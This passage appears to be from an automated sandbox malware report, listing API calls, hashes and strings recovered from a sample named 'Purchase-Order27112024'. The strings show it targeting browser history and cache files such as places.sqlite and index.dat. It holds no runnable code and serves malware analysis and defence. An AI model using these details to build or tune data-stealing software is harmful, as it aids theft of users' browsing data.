                                                                                                      • API String ID: 2808797137-435121686
                                                                                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                      • String ID:
                                                                                                      • API String ID: 1979745280-0
                                                                                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                      APIs
                                                                                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                      • free.MSVCRT ref: 00418803
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1355100292-0
                                                                                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                      • memset.MSVCRT ref: 00403A55
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                      • String ID: history.dat$places.sqlite
                                                                                                      • API String ID: 2641622041-467022611
                                                                                                      • Opcode ID: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                      • Opcode Fuzzy Hash: 3785298ac20b2a611d3c3277302934fe50b5cf091534855024bd32ed14c81bb0
                                                                                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                      APIs
                                                                                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                      • GetLastError.KERNEL32 ref: 00417627
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$File$PointerRead
                                                                                                      • String ID:
                                                                                                      • API String ID: 839530781-0
                                                                                                      • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                      • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileFindFirst
                                                                                                      • String ID: *.*$index.dat
                                                                                                      • API String ID: 1974802433-2863569691
                                                                                                      • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                      • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                      APIs
                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                      • GetLastError.KERNEL32 ref: 004175A2
                                                                                                      • GetLastError.KERNEL32 ref: 004175A8
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                      • String ID:
                                                                                                      • API String ID: 1156039329-0
                                                                                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                      APIs
                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseCreateHandleTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 3397143404-0
                                                                                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                      APIs
                                                                                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1125800050-0
                                                                                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                      APIs
                                                                                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseHandleSleep
                                                                                                      • String ID: }A
                                                                                                      • API String ID: 252777609-2138825249
                                                                                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                      APIs
                                                                                                      • malloc.MSVCRT ref: 00409A10
                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                                                                                      • free.MSVCRT ref: 00409A31
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: freemallocmemcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3056473165-0
                                                                                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: d
                                                                                                      • API String ID: 0-2564639436
                                                                                                      • Opcode ID: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                      • Opcode Fuzzy Hash: b7bdb433cc21537495b9453c0ef7e1d4136cbb83a95eb0b3518e055101e122e1
                                                                                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: BINARY
                                                                                                      • API String ID: 2221118986-907554435
                                                                                                      • Opcode ID: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                      • Opcode Fuzzy Hash: bc3d19a7d02c8d15955695c672ee8877c8483ff31dc40855ee5cfcc836beaa69
                                                                                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: /stext
                                                                                                      • API String ID: 2081463915-3817206916
                                                                                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                                                                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: .#v
                                                                                                      • API String ID: 2081463915-507759092
                                                                                                      • Opcode ID: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                      • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                      • Opcode Fuzzy Hash: cbddd43e50b6ded4d98ad0d82dd6b3ceb41ab08d79f44c56bc7594620457dfc9
                                                                                                      • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                      • String ID:
                                                                                                      • API String ID: 2445788494-0
                                                                                                      • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                      • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_6_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: malloc
                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                      • Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                      • Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
                                                                                                      • Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
                                                                                                      • Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000006.00000002.2586638921.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000006.00000002.2586638921.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
